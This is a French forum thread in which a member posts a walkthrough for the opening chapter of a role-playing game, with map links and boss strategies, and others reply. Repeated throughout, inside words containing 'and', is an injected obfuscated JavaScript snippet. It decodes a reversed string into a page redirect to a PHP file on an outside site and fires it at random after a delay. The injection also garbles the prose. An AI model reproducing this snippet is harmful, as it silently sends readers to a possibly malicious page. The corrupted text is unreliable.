Solution (en cours)

Pour vous aider dans le jeu
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Solution (en cours)

Message par yami627 »

Je suis en train de refaire le jeu sur pc pour pouvoir prendre des screenshot et créer une solution la plus complète possible. Si elle convient, elle pourrait être reprise sur le site il n'y as aucun soucis ^^

Légende des cartes :
Image

Chapitre 1 : La guerre de Serdio
Celesse :
1 poussière d’étoile : sur une pierre tombale
Après la cinématique, vous retrouvez Dart qui se fait attaquer par un dragon. Il est sauvé par un mystérieux chevalier et apprend par celui-ci que son village a été attaqué. Arrivé à Celesse, tuez les deux soldats et parlez au villageois. Avancez et parlez à Plos, le comm$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andant vous barre la route avec deux soldats et vous apprend que Shana est à la prison d’Helena. Tuez-les puis parlez aux enfants dans la maison en ruines. Près des tombes, maître Tasman vous apprend les rudiments du combat. Vous pouvez partir à la recherche de Shana.

Plan : (CTRL+clique sur le liens)
http://img852.imageshack.us/img852/6825 ... elesse.jpg
Modifié en dernier par yami627 le 17 avr. 2011, 23:43, modifié 5 fois.
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Re: Solution (en cours)

Message par Septine Madrona »

C'est une très bonne idée qui dem$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande beaucoup de boulot. Si tu as besoin d'aide n'hésite pas à nous dem$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ander. Et si tu as besoin d'une correctrice pour les textes qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and tu auras fini, sache que je suis là ;)
Au passage, "maître d'armes" s'écrit comme ça, pas besoin de rajouter de "s" au mot "maître". Tu peux aussi enlever le "s" au mot "étoile".

Une dernière remarque, sur la dernière image. Si j'ai bien compris, sur la gauche ça devrait être marqué 1-2, mais là tu as mis 1-1...

Bon courage! :)
Image
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Solution (en cours)

Message par yami627 »

non non, c'est 1-1, la 1-2 ne s'affiche que pour la scène avec Plos (qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and on combat le comm$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andant), après on ne voit plus ce point de vue et on passe directement au 1-1.

la suite :
Forêt :
Traversez la forêt pour rejoindre la prison. Le march$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and vous apprend comment utiliser les objets.
Liste magasin : -Potion guéris 10G
-Purif corporel 10G
-Epuisement 10G
-Potion de charme 4G

Plan : (CTRL+ clique pour avoir les cartes)
http://img222.imageshack.us/img222/4922/carteforet.jpg
Modifié en dernier par yami627 le 17 avr. 2011, 23:45, modifié 3 fois.
Image
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Solution (en cours)

Message par yami627 »

Prison d’Helena :
Cachez-vous dans la charrette pour entrée. Il suffit pour cela d’appuyer sur la touche « X » lorsque le « ! » apparait.
Une fois arrivé à destination, parlez au march$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and, il appelle des gardes à l’aide terrassez-les et reparlez-lui. Vous aurez alors accès à sa march$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andise.
Liste magasin : -Potion guéris 10G
-Prière d’ange 30G
-Filet luisant 10G
Prenez ensuite l’ascenseur (carte 3-6). Vous rencontrez Lavitz, Chevalier du Basil. Après quelques combats, il se joint à vous. Ressortez et prenez l’autre ascenseur. Allez tout d’abord à gauche pour récupérer la clé de la cellule puis revenez sur vos et ouvrez la porte à droite. La cellule de Shana est surveillée par trois garde, tuez les pour délivrer Shana, elle se joint à vous.
Redescendez jusqu'à l’entrée de la prison (le march$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and vous attend cette fois-ci sur la carte 3-6). Fruegel vous barre la route devant les écuries (carte 3-4)
=Fruegel : 88HP=
Pendant l’affrontement, Fruegel fait appel à deux gardiens puis à deux gardiens-chef. Débarrassez-vous d’eux d’abord (attention, les gardiens-chefs utilisent de la magie avant de mourir) puis, occupez-vous de Fruegel.
Après le combat, vous vous enfuyez avec vos compagnons. En route pour la prairie.

plan : (CTRL+cliquez sur les liens pour les afficher)
http://img852.imageshack.us/img852/9505/cartehelena.jpg
Image
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Solution (en cours)

Message par yami627 »

Prairie :
Les gardes d’Helena sont toujours à vos trousses. Vous vous cachez dans les hautes herbes. Une fois les gardes partis, allez à gauche, vous ne pouvez pas traversez la rivière pour le moment. Revenez sur vos pas et allez en bas à gauche, vers une cabane où vous pouvez vous reposer. Après une petite scène, suivez le sentier en haut à gauche puis coupez l’arbre. Revenez à la rivière, l’arbre vous sert de pont, vous pouvez partir.

plan : (CTRL+cliquez sur les liens pour les afficher)
http://img268.imageshack.us/i/prairiecarte.jpg/
Image
Avatar du membre
Gatsu
Dragon aux Yeux Rouges
Dragon aux Yeux Rouges
Messages : 46
Enregistré le : 11 mars 2009, 16:19

Re: Solution (en cours)

Message par Gatsu »

Oula de même bon courage car c'est énormément de travail ! Demande moi si besoin d'un coup de main.
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Solution (en cours)

Message par yami627 »

c'est gentils ^^ je vais essayer de m'y remettre surtout parce que je n'ai pas pus ces dernières semaines ^^

Mais vous en faites pas, je suis motivé :twisted:
Image
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Re: Solution (en cours)

Message par Septine Madrona »

Nous n'avons plus de nouvelles, j'espère que tu n'as pas laissé tomber...
Image
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Solution (en cours)

Message par yami627 »

non pas du tout ^^ c'est juste que j'ai une succession de tracas mdr donc j'ai plus trop le temps. Des que je règle tout je m'y remets ^^
Image
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Solution (en cours)

Message par yami627 »

décidément, ça fait longtemps que je ne suis pas venu XD vous avez du croire que j'avais déserté lol

enfin bref, me revoilà avec la suite de ma soluce (et les cartes que j'ai un peu modifiées). Par contre, j'ai vu sur le site qu'une solution avez était mise ne place... je continu la mienne qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and même ?

Grotte à chaux :
Avancez jusqu’aux ruisseaux. Prenez le premier en maintenant le joystick à droite pour récupérer une arme pour Dart. Reprenez ce même ruisseau sans rien toucher cette fois-ci pour récupérer des Gold. Continuez à avancer jusqu’aux lucioles des roches (celles-ci vous régénèrent vos HP).
Dans la carte 5-5, si vous rattrapez l’animal, vous obtenez Antipoison.
Revenez sur la carte des lucioles et allez en bas à droite jusqu’au point de sauvegarde. Peu après celui-ci, vous êtes attaquez par le gardien des lieux. Avant le combat, équipez vous contre le poison.
=Urobolos : 280HP – élément terre=
Faites combattre Dart et lavitz pendant que Shana se protège. Lorsqu’Urobolos se mets hors de porté, c’est au tour de Shana d’attaquer (si vous avez des objets d’attaque, c’est le moment de les utiliser !) et Dart et Lavitz de se protéger. Avec cette stratégie, vous n’aurez normalement pas besoin d’utiliser de potion et le combat sera rapide.

A la fin du combat, une mystérieuse force protège Shana contre le gardien de la grotte. Vous n’avez plus qu’à sortir de la grotte direction Bayle.

plan de la grotte : (CTRL+cliquez sur les liens pour les afficher)
http://imageshack.us/photo/my-images/83 ... chaux.jpg/

les anciens plans modifié (j'ai indiqué où était le début en fait XD)
http://imageshack.us/photo/my-images/71 ... lesse.jpg/
http://imageshack.us/photo/my-images/84 ... foret.jpg/
http://imageshack.us/photo/my-images/70 ... elena.jpg/
http://imageshack.us/photo/my-images/71 ... carte.jpg/
Image
Répondre